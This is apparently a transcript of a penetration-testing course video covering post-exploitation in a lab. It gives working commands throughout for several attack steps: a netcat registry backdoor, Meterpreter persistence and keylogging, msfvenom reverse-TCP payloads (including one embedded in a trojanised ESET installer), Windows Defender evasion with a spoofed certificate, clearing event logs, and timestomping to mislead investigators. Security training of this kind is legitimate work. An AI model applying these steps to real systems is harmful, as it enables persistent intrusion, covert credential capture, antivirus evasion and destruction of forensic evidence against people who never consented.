you go. And the second command, PowerShell import, type PowerShell import, and then the path to the file that you want to import. So I'm going to import host recon file. And you can download it from these addresses. So after you import the file, then you need to run this file. To do so, just type PowerShell execute invoke host recon. Now, it has a very long output, and it takes a few more seconds. It enumerates the target system very well. IP information, user information, active connections, services and processes, shares, and so much more. Okay, so now I will import another PowerShell file, host enum, and you can download this file from that address. Then type PowerShell shell. So now you are in PowerShell shell. And to run the script you imported, type invoke host enum local. And compared to host recon, this one brings much more information about the target. And that's with all these extensions. So as I said before, Meterpreter sessions reside in the memory of a process. So when this process finishes, the Meterpreter session will die, and you will lose your connection to the compromised machine. If you lose it, then you've got to exploit the target again. So if you want to avoid this, you migrate to processes that can't easily be terminated by a user, such as LSAS. However, it's not always a permanent solution, especially if the user completely shuts down the computer, right? So, we've probably got to find a better way to come back again and not to repeat the exploitation because the system might be patched already, but hopefully not. But you've really got to be careful because what you're going to do next should be clearly specified in the scope of the engagement. All right, so let's move on. Rather than re-exploiting the same vulnerability or move between the processes, it would be ideal to have a persistent connection with the target. So to accomplish this idea, you can create backdoors, add users, use rootkits, and there's a bunch of other things. But thankfully, MSF Interpreter will let you be persistent on the target system. And that is what is going to keep your access for future exploitations, and then you can spread throughout the network. Now, one thing you should keep in mind is, don't forget your backdoor when the penetration test finishes. So Meterpreter has some very useful functions for registry interaction. You can read, write, create, and delete remotely any registry entry. So these can be used for, well, any number of actions, including remote information gathering. So by using the registry, one can find what files have been used, websites visited, programs, USB devices used, and so on and so forth. So basically, the Windows registry is a magical place if you're planning on doing more. And yes, it is my job to help you do more, so let's plan for it by creating a persistent netcat backdoor. So in this example, instead of looking up information on the remote system, you will be installing a netcat backdoor. And it's going to include changes to the system registry and firewall, and send back to you a persistent shell. So let me show you the concept. After gaining a Meterpreter shell, you can use the reg command to interact with the Windows remote registry. And here's a help menu for this command. And you can do many things with these parameters. But my point here is to create a persistent backdoor on the target. And to accomplish that, I will upload netcat, which is a legitimate .exe file. So, upload user share Windows binaries nc.exe to C Windows System 32. And sure enough, uploading's okay. So now I need to run netcat on behalf of the current user by manipulating the registry. To do that, first I'm going to enumerate the key HKLM software Microsoft Windows current version run. Now this key is special because it defines the applications that will run automatically when the system starts. Enum key will bring the values, and K to specify the key name. And here are the entries of the key. So now I'm going to add a value to this key so that I can run the netcat. So type reg set val k, the key name, and v backdoor, and then d c Windows System 32 nc.exe lbp 4444 e cmd.exe. Okay, it's a long line, but it's kind of simple to explain, so let's break it down. Set val will set the value of an entry for the registry key. V gives a name to the entry. And finally, the D adds the data to the entry. Yep, so ending the entry is okay. Reg query val k the key name, and v backdoor. So query val will display the data for a specific entry as it is. Okay, netcat will be run with these parameters, and it'll start a Windows command line on port 4444 if Metasploitable 3 restarts. Oh, so let me quickly show you the registry as well. All right, so here is the value that you just added. And now I'll quickly restart Metasploitable 3. Metasploit starts again. And see, my session naturally died. But now I don't need this anymore. So I'll open a new tab. Type ncv 10.10.2.10 and port 4444. Perfect. We connect the Windows command line that netcat started for us on port 4444. So that way you can use any Windows commands here. For example, ipconfig. Congratulations, you have your first persistent backdoor. And you can come back anytime you need to use it. And let me tell you additionally, in a real-world situation, you would not be using such a simple backdoor like this because, there's no authentication or encryption. However, the principles of the process remain the same for other changes to the system and other sorts of programs that you might want to execute on startup. I'm going to tell you about MSF Venom in the next section so that you can create later on your custom .exe file to use for this process. All right, so how's everybody doing? I'm thinking that it's time that I tell you about key logging in this particular section because it's part of the maintaining access process. So what I mean is that this is going to help you to be permanent on the system. So here's my take on it. Using key logging is about ethics. So if it's clearly not described in the scope that you've already established with your client, then I would recommend you hesitate logging your target's keyboard. So it's very common to see employers' personal information, such as chat messages when you perform key logging, because almost every company, because humans are humans, employers will hold their personal data on work computers and use these computers to look at their personal emails, social media accounts, and whatever else. In fact, I've seen some penetration testers doing key logging as soon as they gain access to a system. I don't consider that purely ethical. In fact, I don't like it at all. It's really not good unless you are doing a social engineering or a phishing attack for the purpose of gaining awareness. And again, make sure that it's part of the scope you've already established with your client. So MSF allows you to capture all keyboard input from the system without writing anything to disk, leaving a minimal forensic footprint for investigators to follow up on later. So it's perfect for getting passwords and user accounts and all sorts of other valuable information. MSF offers several ways for key logging, such as interpreter scripts and post modules. So let's have a look and see how it works. So here I have a system level session on the target, and I'm going to conduct everything forward from that session. So normally having a session with privileged user rights is good, but when you try to record keys, you will need to downgrade and then migrate the exact process so that you can read the key logs of a specific user. So it's always good to migrate explorer.exe to record what the user types. However, to record the Windows login information, you will have to migrate winlogon.exe. PS S explorer.exe to see the PID value of explorer.exe. And in this case, it is 4188. So let's migrate 4188. And the migration completed successfully. So, get UID. And yes, so now you downgrade our user. I'll first start with std API extensions commands. Keyscan start H. Keyscan start command will start keylogging. Now it has a few parameters. So type keyscan start V. And now the keystrokes of the current user will be saved. And then the V parameter will also record the active window for us. So open Metasploit 3 now, and let's write something. So I have a password file here. And I'm going to add some passwords here. And we'll do a search in the Explorer. And open the command line. List users. Let's display a user. And let's make a remote connection to 10.10.2.12. And now I'll do many things here. So turn back to Kali and just type keyscan dump. Yeah, see, that's very good. So everything I type within the active windows are here. And now I'm going to stop key recording by typing keyscan stop. Okay, so these std API commands are good to use, but you will be responsible for what you do. And now for the next flavor. It's a post module. So here is the information of this module. Actually, there is also a Meterpreter script for this module, but unfortunately, it doesn't work properly. So all you have to do is type run and then the name of the post module. And then it will start. So now let's open Metasploit 3 and type something again. I'm going to add new passwords. And display users from PowerShell. Run an application. Okay, and then go back to Kali. Type Control and C to stop recording. And it stopped. So copy this file path. Open a new tab. Vim. And then paste the path. And then this is what I typed on Metasploit 3. So keylogging may provide you access to spread throughout the network whenever you compromise an administrator computer. However, it can also bring some serious privacy problems. So I would advise you again to, if you use it, to use it, please, respectfully. Now, as I said before, creating a backdoor might be a good way to return. So, I want to show you a few backdoors presented in Meterpreter. The first one is Meterpreter Service, or abbreviated to MET-SVC. So it's a standalone program, but it is implemented for Meterpreter. Now, word of warning here before you go any further. Met service requires no authentication. So it's better to be careful because another one may connect to your backdoor. Now, next flavor, persistent script. Metasploit also has a meterpreter script, persistence.rb. And that's going to create a meterpreter service that will be available to you even if the remote system is rebooted. So this way, if the service you initially exploited is down or patched, you can still gain access to the system. Another word of warning here, before you go any further, the persistent script requires no authentication. So that means that anyone that gains access to the port could access your backdoor as well. Okay, so the next flavor is a post module, persistence exe. Now it's more consistent than the other ones. Also, it allows you to create your own backdoor file from the beginning. But before running the module, you'll need to create the backdoor that contains the payload for us. So let's have a look at what we have. All right, so I've already gained access to the target system, and I'm going to use this session to perform persistency on my target. I'll use my first flavor, it's Met service, but unfortunately the script doesn't work properly yet. So I'm going to move on to the second one, the persistence script. So first, let's open up a new tab and go to the Meterpreter scripts directory. Type in vim persistence.rb. Now, this is the Meterpreter persistence script. When you follow the codes, you will get the warning logic. And here's a help menu code for this script. And because Meterpreter scripts are now being made obsolete, you're not going to be able to display their help screens. So it's always good practice to double check your parameters here. Okay, quit Vim and return to Meterpreter. Then type in run persistence X to start the agent at boot time. P4443, that's the port that the agent will connect back to. I5, it's a time interval for the agent to send reconnect probes. R10.10.2.11 is the connect back address for the agent. In this case, that's going to be the IP address of Kali. So we can hit enter, and also you can specify a parameter to automatically create the handler. But right now, we're going to do it manually. And we'll send the session to the background. Use exploit, multi-handler. Set payload to Windows, Meterpreter, reverse TCP, set lhost to 10.10.2.11, the IP address of Kali, set lport 24443. Now, show me the options. Good. Everything looks A-OK. So now, exploit. And you'll see that the session opened immediately. But I really do need to be sure exactly. And you can also see BG, sessions, and here is your persistent session over port 4443. Interact, session 4, get UID, sysinfo. Alrighty, see, so there is a persistent backdoor on Metasploitable 3. Now the backdoor will connect back to us when the system is awake. So let me warn you again about this script. It could cause problems. It has the potential, we'll say, to cause problems because someone else may connect to it, especially if you forget about it or you're just unaware. So remember that. So I'm going to go back to my original session. Okay, so the next flavor is a post module, persistence exe. So this is the information for this module. Now it's more consistent than the other ones. Also, it allows you to create your own backdoor file from the beginning. But before running the module, you'll need to create the backdoor that contains the payload for us. So let's open up a new tab. Type MSF Venom, P, and then your payload name. And the payload options, null host equals IP address of Kali, null port equals 4442, and other options. FEXE specifies the format of our final file. AX86 specifies the architecture of the final file. Platform Windows specifies it as a Windows system file. O defines the name of the produced payload file. Persistence.exe. LS. So let's go back to the interpreter session. Run post Windows manage persistence exe. Our exe name equals persistence.exe. So this is the name that will be shown in the task list of the target. Our exe path equals root desktop persistence.exe. This is our payload file. Startup equals system. So this option enables a payload to start when the system is booted. Okay, so hit enter. And the module is successfully executed. So now let's start a handler for the module. So I'm already using the handler template. Show options. And I'll just set L port to 4442 and then exploit. All right, so I'm going to reboot Metasploitable 3 quickly. Now here, watch the interpreter screen on the left pane. You can easily see this session open. Get UID, sysinfo. Alrighty, so this is what I want. But I also need to be sure to put it in the background. Sessions. Alright, so this is it. I have the connection on port 4442. Now, when the system reboots, we'll get up a session on the target. One of the biggest challenges that a penetration tester can face is antivirus evasion. The payloads that you generate in the previous section are for learning purposes, right? So I don't care about you being caught by antivirus software. In fact, that might even mean you did it right. However, in a real penetration test, if your payload is detected, then this is going to be useless, and sometimes that's embarrassing, and it makes it look like you have no idea what you're doing. So in this section, I'm going to explain some concepts and some solutions that will remove antiviruses from ever being an issue. Now, this is very cool. So most antivirus software use signature-based detection engines to verify if a file on disk is malicious or not. So basically, AV software scans the storage and compares the signature of a suspicious file with its signature database. And of course, if a match is found, then AV alerts and marks that object to take certain steps against it. And basically, that's how antivirus software works. But this system doesn't fit. It has scaling problems, and if there's no match for a signature, a malicious program won't encounter any protection mechanism. As you might imagine, this method is not good enough to trust 100%. Antivirus companies also think that. So they'll invest in many new methods, create new products, use AI, machine learning, everything they can throw at it. However, most of them still work this way. Now, do you remember what we were saying earlier about Metasploit payloads? They're basically designed to run in memory, so they never write data to the disk. So when you send a payload using an exploit, most antivirus programs won't even detect that it's been run on the target. However, during a compromise, you're often going to perform certain actions that will modify, add, or delete files on the target's file system. So that already implies that your actions can be traced and detected by antivirus software. So, you're just going to need to be a little stealthier by playing in a different way to beat those antiviruses. So prior to MSF Venom, there were MSF Payload and MSF Encoder that would help us to compose more stealthy payloads. Now, I want to start it like a fairy tale or a story, but it wasn't really that far back. The way I remember it, it was 2015 when MSF Venom replaced both MSF Payload and MSF Encode. Now, I really like this tool. As it's defined in its description, a Metasploit standalone payload generator. So I think the guys from the Metasploit team deserve applause for this brilliant tool. At first glance, you might think, it's a simple tool, what can it do? And yes, the power is derived from its simplicity and ease of use. However, it is very comprehensive when you examine its payloads, encoders, and other capabilities. So let's have a look at how to use this tool. Open up a terminal tab and simply type MSF Venom help to discover the tool. The help screen is pretty well defined and the parameters are well explained, so make sure that you become well acquainted with it. Now you can define many properties for your payloads. You can add NOP-SLEDs, avoid bad chars, even add custom codes to your payloads. Also, MSF Venom allows you to encode the payload and even lets you use an executable template to be stealthier. MSF Venom supports all Metasploit payloads. So to list the available payloads, type MSF Venom L payloads. To list encoders, just type in MSF Venom L encoders. And you can do this for any of the architectures supported, for platforms, and for formats. With MSF Venom, you have many ways to create a payload file. C, Python, ASPX, and many other types. So you can use any payload with almost all options inside MSF Venom. So let's type MSF Venom P, then the payload name, and to list the options for a payload, add List Options. And here we have the description of Interpreter Reverse TCP payload. So while creating a payload-contained file, you can use all these options to build a more specific file. So now let's create a file from the very beginning. MSF Venom P, then the payload, Windows x64, interpreter, reverse TCP, and payload options, lhost equals 10.10.2.11, lport equals 4441, platform Windows for Windows systems, A x64 for 64-bit architectures, FEXE for Windows executables, and finally, O for the output file name, normal.exe. Okay, so my executable is now saved in the malware directory. And I'll change the directory to desktop malware. ls normal.exe file resides here. So file normal.exe. And see there, you can tell that the file is a Windows executable. So now, go to Metasploit and start a handler. Use exploit multi-handler. Set payload to Windows x64 interpreter reverse TCP. Set lhost to 10.10.2.11. Set lport to 4441 and show the options again, just to double check. Right, so everything looks good. Exploit J, and okay, so the handler started. So now I'm going to open up a new tab and start a Python server from the malware directory. Python m simple HTTP server on port 8000. Then I'm going to open Metasploit 3. Start Internet Explorer and go to http://10.10.2.11:8000. So this address will show the files in the malware directory on Kali. Now, click the normal.exe to download and save it to the desktop. Okay, so let me just open MSF console. For Metasploit 3, run normal.exe by double-clicking on it. On the left pane, you can see the session open. So type sessions, and this is it on port 4441. So interact with session 1, get UID, sysinfo. And there you have it, the basic usage of MSF Venom. So you use a payload to generate a vulnerable file. Then you deliver this file to the target, and then make the target run this file to connect back to the handler running on our Kali. So what I'll do is apply this logic in the next few videos as well. So strap on your seatbelt. We're going to go for a ride. So I showed you earlier in the 4th section about encoders. MSF Venom uses these encoders to keep you hidden from antivirus softwares. Encoders alter the code in an executable so that it looks different to antiviruses. They encode the original executable in a new binary, so that when the executable is run, the original code is decoded into memory and executed. Now, different encoders are used for different platforms. MSF Venom also has an option to iterate the encoding process. So what I mean by that is it allows for multi-encoding. I'll show you by example. So to create an encoded payload, you're going to need to specify with the E parameter. Then to iterate the encoding for several times, use the I parameter. So it is very easy to use a payload. Now the only thing that I want you to know is the encoder name and if it's suitable for your needs. So let's generate a file that contains an encoded payload. MSF Venom P Windows Meterpreter reverse TCP lhost equals 10.10.2.11 and lport equals 4442. And the platform is Windows. Architecture is 32-bit. File type is a Windows executable. And then E is the encoder name. x86//shikata_GA_NAI. I5 to iterate the encoding 5 times. And then let's give a name to the output file. So here we're going to need to be careful that we use a suitable encoder for the other parameters, such as architecture. All right, so now that file is created and saved. ls. And look, there it is. The file is a 32-bit Windows executable. So now we're going to need a handler. So open MSF console, and I'm already using the handler template. So let's see some options. All right, so now I'm going to need to change everything. So set payload to Windows Meterpreter reverse TCP. Set lhost to 10.10.2.11. Set lport to 4442. And nothing to set. Show the options again, and everything looks fine. Now then, exploit J. The Python server is still running, so open Metasploitable 3 and refresh the page. Download and save encoded.exe file to the desktop. Now let's open the MSF console to observe this session. And now let's run the encoded.exe by double-clicking. And if you look over onto the left pane, you can see that the session has opened. Sessions. All right, so you got the session on port 4442. So now you can interact with session 2. Get UID, sysinfo, and this is definitely Metasploitable 3. So typically when MSF Venom runs, the payload is embedded into the default executable template at data templates, template.exe. Although this template is changed on occasion, the antivirus vendors still look for it when building signatures. However, MSF Venom supports the use of any Windows executable in place of the default executable template. The important point here is you should take very good care about not disturbing the usage experience of the system owner or user. And the best part about it is it's extremely simple. So why don't we embed a Metasploit payload in an executable? First off, you're going to need a Windows executable file. So you can either download or use what you have already. So I'm just going to download the ESET NOD32 initial downloader file to embed the payload. So open up your browser and go to the ESET website. If you scroll down a little bit, click on the download button, and it will redirect you to a download page. Click on the download link and save the file. Now, open a terminal, and then type in MSF Venom P Windows Meterpreter reverse TCP lhost equals 10.10.2.11 and lport equals 4443. Platform is Windows. Architecture is 32-bit. File type will be Windows executable. No encoding and iteration. Then X to specify a custom executable file to use as a template. So in my case, it is ESET Nod2 Antivirus Live Installer. And now K to preserve the template file behavior and inject the payload as a new thread. So now let's give a name to the output file. And I'll use the same name as ESET Nod32. So the file is generated, ls, and it's here in the malware directory. And let's see the result of the file command. So it's a 32-bit GUI Windows executable. Now for the most part, when a targeted user launches a backdoored executable like this, if nothing appears to happen, it can raise suspicions. So to improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application. But for now, you just embed the payload into an executable template. All right, so now you're going to need a handler. So open MSF console, and the handler template is already chosen. Show me the options. And there's nothing to change except L port, so set L port to 4443. But you're going to need to set another variable also. So as soon as the user launches the malware, you need to jump to another reliable process. So let's see. In our case, you're going to do this, but you can also do something else. So show advanced. And here's a variable, auto run script. So this variable specifies what to do first if the exploitation is accomplished. So in other words, in this particular scenario, you're going to need to migrate a reliable process. So then that means set auto run script to post Windows manage migrate with the parameters name equals explorer.exe and spawn equals false. So then after exploitation, this script will run and migrate to explorer.exe. Okay then, let's hit exploit J. Go back over to Metasploit 3, refresh the page, and then download and save the ESET Nod32 file to the desktop. And there's the file. So let's double click it and launch it. So did you see that the session opened? And immediately upon opening the session, the post module is executed. So there we have it. We've successfully migrated to Explorer. So, sessions, interact with session 5, get UID, sysinfo, and yes, this is what you want. Now, unless the user closes the computer, you can move around anywhere you want. MSF Venom is a really good tool when you're trying to generate payloads. It has a whole lot of features that allow you to play with many things in payloads. However, antivirus software companies constantly update their databases and detection mechanisms. As I said before, they can use artificial intelligence and machine learning, cloud computing, and many other technologies to improve their products because they're trying to sell them and make a profit. So that means MSF Venom payloads are pretty much always detected. I'd say, 85% of the time, mostly, we'll say, they're detected by these improved technologies. But I want to show you something. So open Windows 10 and go to http 10.10.2.11.8000 to view our malware folder from a browser. Now the 3 files that we created in the previous videos are here, so let's download them in order. Click on normal.exe and save. Whoa, Windows Defender detects this as a virus. It detects it even when I download it, but not when I launch. See, that's a big improvement. So the next file, download encoded.exe and say. So as you can see, while downloading, Defender scans the file. Okay, so that's detected as well. Let's have a look at the third file. Click it to download and save it. Defender's also scanning the file. Okay, unfortunately, it's also detected as a virus. So then, let's go back to Kali. What do you think we should do at the moment? So the point I'm trying to make here is that antivirus software and payload generators are in competition. So today your payload can successfully execute on your targets and you can evade the antivirus software. But a few days go by and the same payload may be prevented to be executed and detected as malware. So then you need to find a new custom payload generator. So at the time I record this course, I'm looking for a custom payload generator. And I found one on GitHub. And you can use this one or find another one for yourself. Alrighty then. Let me show you first how to install this custom generator. So I'm going to use another Kali instance for a fresh install. So open up your browser and go to this GitHub address. Phantom Evasion is the name of this payload generator. So I'll download it as a zip file. Then open File Explorer and go to the download directory and extract it. And then you can cut or copy the extracted folder to the Evasion folder on the desktop. So here are the files in the Phantom folder. Close it up and open your terminal. So change the directory to Phantom folder like this. Then type chmod +x phantom evasion.py to make the file run by the current user. And then type python phantom evasion.py to start the installation. So the installation will take a really long time, but be patient. And as always, I'm not going to record the whole installation, you just wait for it. And we're back. After the installation, you will have this screen, which means you installed it perfectly. Now I'm going to go back to my Kali and go to Phantom folder, then run python phantom evasion.py. Now you can explore all the modules. There are many, many very useful ones. What I'm looking for is a stealthy Windows payload. So type 1. And it will be a stager, so type 2. Windows 10 box is 64-bit, so type 2. And then these are the payloads that Phantom Evasion provides for us. So I'm going to choose the fourth one. X64 Meterpreter Reverse TCP. So this has a short but informative warning, and it also shows the required payload for the handler. So I'll press enter to continue. Provide lhost, which is 10.10.2.11. lport is 443. Then file name, Phantom, I think is a good name. Now it's good to add multiple processes behaviors. So type Y, insert 2 decoy processes, and striping the executable will also help. So type Y. It will sign the executable if you want. So yeah, I do. So type Y. So it'll spoof a Microsoft certificate and fill with notepad information. And then finally, the payload is generated. So the file is in the Phantom Evasion directory. And open up a new tab, ls. And as you're looking at what I'm looking at, you'll see the phantom.exe is right here. All right, move phantom.exe to root desktop malware. So I moved it here because I already have run the Python server from this folder. So now I'll go to the MSF console, set payload to Windows x64 interpreter reverse TCP, set lhost to 10.10.2.11, and set lport to 443. Show options to check, make sure everything's okay, and if there's no problem, then exploit J. Okay, so now open Windows 10 and open the download page for our executables. Refresh the page. Now download the phantom.exe and save it. Windows Defender is scanning the file, and just like that, it does not detect anything. So now open the download folder and double-click the file to launch it. Now you might think you are detected, but no. Click More Info and you'll see why. Because Microsoft doesn't know the publisher of this executable. So it just warns us, which nobody really cares about this. You know it warns even for very well-known applications. So you can run it anyway. Most people do. Then go to Kali and open the MSF console tab. So here's a tip. Because you use the decoy processes and some other techniques applied to the payload as well, it's going to connect back, but it's going to take a bit. So just wait for it. Believe me, the session will open. Okay, it didn't prove me wrong. There it is, the session has opened. Hit enter and type session. So now you can interact with session 8. Type get UID, sysinfo, and congratulations, you have now evaded the Windows Defender on Windows 10 and got a interpreter session. Well done. Now, after you complete your penetration test, your next step should be to clean up the mess behind you. So as long as there's no forensics and event response purpose that the client's planned, you should erase and cover your tracks. So although Meterpreter resides in the memory during a pen test, you might add users, create backdoors, routings, registry entries, etc., etc. The list could go on. All of them should be cleared. So for this kind of stuff, MSF has two features: the command clearref and the Meterpreter script event manager. Now, you can use both so that you don't leave anything behind. However, you can only run them with an admin level session. So let me show you how to use them. So I already have a system level session, and I'm going to conduct cleaning from this session. But first I want to show you the event logs on Metasploitable 3. So open Metasploitable 3, and from Start, type Event Viewer, and click it. Now, go to the Windows Logs section. And here are the different categories of logs. Now, probably what you've done a while ago was logged by Windows. And now I'll assume that there is no forensic purpose of your penetration testing. So it means that you can clear the logs and all that you've done on the system. So this action is more or less offensive, but it will be very handy so that you can escape any detection from any of the system administrators. So let's go back to the Meterpreter session and just type clear ev, and that's all. You've just cleared the event logs. So let's see what you did from the target. Refresh the screen from the action menu or click Windows, logs again. Nothing, just a few new ones. So the second flavor is a Meterpreter script called Event Manager. So run Event Manager. Without any parameter, it will display the Help menu. And now open Metasploitable 3 again. By the way, I return from the snapshot to show you the logs. So go to Event Viewer from the start. And under Windows Logs, you can see how many entries are in log categories. Then go back to the Meterpreter session. Type in Run Event Manager. See the Help menu again. Now this time run Event Manager with the C parameter. See, that's very good. It just deleted the logs. So let's open Metasploitable 3 to see what the script did. Perfect. You see, it really did delete all the logs. Don't touch that file system. You will leave your fingerprints everywhere or anywhere you touch. I'm sure that as a penetration tester, you mostly won't need this command, but I will mention it because somehow, once or twice, okay, so I've used it a couple of times, and I think you might need it too. So it remains a piece of good information. First, I want to talk about file system and metadata, just for a little. Every file on the file system, no matter what it is, has metadata, which contains information such as time and date, when it was created, accessed, modified, its size on the disk, its ownership information, and so on and so forth. For a forensic examiner, metadata information is really important to uncover a fraud or something along those lines. To me, it's not that bad if a forensic analyst follows your traces and detects how you compromise the system. It might even be in the scope of the test for blue team analysis. However, as a penetration tester, you may need this command in certain other situations. For instance, file integrity monitor software is a good reason to watch out for. Now, my point is that you may sometimes, in a special situation, and it does vary upon your usage, you might need to manipulate the file system integrity to escape from a monster. Remember to use timestamp. So, let's see where it is. Now, you will need to have at least an admin level session to manipulate the file system using timestamp. So type timestamp H to display the help menu for this command. And look at that. Here it has some parameters to specify commands. So first, I'm going to check where I am on the target actually. PWD. All right, so I'm in System 32. So I'm going to change the folder to C, WAMP, www, uploads, PWD. Yes, I'm there now. LS. And I think you probably remember allports.exe. You use that file when searching and testing for vulnerabilities. And to view a file's MACE data, use timestamp with the V parameter. Timestamp and the path of the allports.exe. Look at that. I can't talk and type at the same time. I didn't add the parameter. So then add the V parameter. Now, by the way, MACE stands for the first letters of modified, accessed, created, and entry modified words. So anyway, go to the upper folder. LS. Now here there is a testmysql.php file. When you display the MACE data, it was last modified in 2010. So, to hide allports.exe file, timestamp can pull a file's MACE data and set for allports.exe using the F parameter. Timestamp C, WAMP, www, uploads, allports.exe, then type F, and the second file, C, WAMP, www, testmysql.php. And the command's executed successfully. So let's check it. Use the arrow key to move in the history. Okay. So now you can see allports.exe now has testmysql's mace data. So you can also set these values to a specific date if you want. For example, you can use the C to set a created date. Timestamp, the path of allports.exe. C, use double quotes for dates. 1/1/2000 for the date and 1/1/1 for time. Use the arrow key to move in the history. Okay, and it changed successfully. Now, of course, you're thinking that you can, change some other attributes in the same way. Just use the arrow key for previous commands and just change the parameter to A for accessed date and change parameter to M for modified date. And now display the mace data for allports.exe. And look at that, you successfully changed. Oh, I forgot the entry for modified date. So use the E parameter to set a specific date. And it changed that as well. So I think you got the point here that you can change the mace data to confuse the analyzer. Awesome.